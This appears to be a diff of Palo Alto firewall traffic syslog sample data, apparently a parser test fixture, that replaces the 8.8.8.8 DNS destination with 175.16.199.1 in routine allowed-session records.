+520 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7365,1,56105,53,4178,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:32,0,any,0,2825883,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 534 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7209,1,39917,514,45545,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:32,0,any,0,2825884,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7790,1,40172,53,26434,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:32,0,any,0,2825885,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 537 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7582,1,33442,514,48219,514,0x500070,tcp,allow,905,633,272,9,2020/03/27 09:57:17,0,any,0,2825877,0x0,192.168.0.0-192.168.255.255,Germany,0,5,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 573 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.2,172.217.23.174,0.0.0.0,172.217.23.174,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,47200,1,59650,443,52552,443,0x1400070,tcp,allow,35266,1829,33437,44,2020/03/27 09:57:17,0,search-engines,0,2825878,0x0,192.168.0.0-192.168.255.255,United States,0,15,29,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 537 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.1.2,208.67.220.220,0.0.0.0,208.67.220.220,Internet Access,,,insufficient-data,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:31,6505,1,35869,443,62927,443,0x400064,udp,allow,333,98,235,2,2020/03/27 09:57:02,0,any,0,2825881,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 528 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.1.2,208.67.220.220,0.0.0.0,208.67.220.220,Internet Access,,,dnscrypt,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:31,7553,1,54348,443,5940,443,0x4000e9,udp,allow,895,238,657,2,2020/03/27 09:57:02,0,any,0,2825880,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 533 <14>1 2020-03-27T09:57:32+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:31,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7309,1,38650,514,8645,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:32,0,any,0,2825886,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:30,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:30,192.168.1.2,208.67.220.220,0.0.0.0,208.67.220.220,Internet Access,,,dnscrypt,vsys1,Servers,External,ethernet1/2,ethernet1/1,Default,2020/03/27 09:57:30,38778,1,46538,443,52919,443,0x400000,udp,allow,968,430,538,2,2020/03/27 09:57:31,0,any,0,2825873,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
@@ -61,33 +61,33 @@
 537 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7389,1,43531,514,16990,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:12,0,any,0,2825847,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 532 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7603,1,32801,514,57533,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:27,0,any,0,2825850,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 534 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7835,1,37836,514,31566,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:27,0,any,0,2825852,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,6818,1,35615,53,24414,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:27,0,any,0,2825851,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 576 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:25,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,7577,1,59652,443,35333,443,0x1400000,tcp,allow,4605,1298,3307,11,2020/03/27 09:57:26,0,computer-and-internet-info,0,2825842,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 537 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:25,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,7223,1,49731,443,23376,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:26,0,any,0,2825843,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 571 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,7032,1,49727,443,22055,443,0x400070,tcp,allow,19474,1561,17913,28,2020/03/27 09:57:10,1,government,0,2825840,0x0,192.168.0.0-192.168.255.255,United States,0,10,18,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 554 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:25,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,web-browsing,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,7577,1,59652,443,35333,443,0x1400000,tcp,allow,4605,1298,3307,11,2020/03/27 09:57:26,0,any,0,2825841,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+528 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:25,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:25,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:25,6830,1,56089,53,52306,53,0x400064,udp,allow,248,108,140,2,2020/03/27 09:56:56,0,any,0,2825839,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 539 <14>1 2020-03-27T09:57:25+01:00 PA-VM - - - - 1,2020/03/27 09:57:24,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:24,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:24,7577,1,59652,443,35333,443,0x400000,tcp,allow,763,697,66,4,2020/03/27 09:57:26,0,any,0,2825838,0x0,192.168.0.0-192.168.255.255,United States,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 571 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.3,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7185,1,49726,443,52475,443,0x400070,tcp,allow,20666,1563,19103,29,2020/03/27 09:57:06,1,government,0,2825824,0x0,192.168.0.0-192.168.255.255,United States,0,10,19,tcp-rst-from-client,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 535 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,58586,1,39016,514,26342,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:22,0,any,0,2825831,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6907,1,40729,53,24891,53,0x400000,udp,allow,95,95,0,1,2020/03/27 09:57:23,0,any,0,2825832,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 538 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,57540,1,41143,514,41559,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:07,0,any,0,2825822,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 538 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,47307,1,37533,514,49274,514,0x500070,tcp,allow,839,567,272,8,2020/03/27 09:57:07,0,any,0,2825825,0x0,192.168.0.0-192.168.255.255,Germany,0,4,4,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-520 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
-521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+527 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6374,1,42977,53,41087,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:52,0,any,0,2825827,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+520 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,6532,1,52267,53,5824,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:22,0,any,0,2825828,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
+521 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7511,1,38271,53,45069,53,0x400000,udp,allow,98,98,0,1,2020/03/27 09:57:22,0,any,0,2825830,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 581 <14>1 2020-03-27T09:57:21+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:21,192.168.2.2,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,google-base,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,62489,1,59647,443,36913,443,0x1400070,tcp,allow,7129,1513,5616,22,2020/03/27 09:57:07,0,computer-and-internet-info,0,2825826,0x0,192.168.0.0-192.168.255.255,United States,0,10,12,tcp-fin,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
 532 <14>1 2020-03-27T09:57:22+01:00 PA-VM - - - - 1,2020/03/27 09:57:21,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:21,192.168.2.4,0.0.0.0,0.0.0.0,0.0.0.0,Internet Access,,,ssl,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:21,7712,1,34594,514,40984,514,0x500000,tcp,allow,575,501,74,4,2020/03/27 09:57:22,0,any,0,2825829,0x0,192.168.0.0-192.168.255.255,Germany,0,3,1,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,
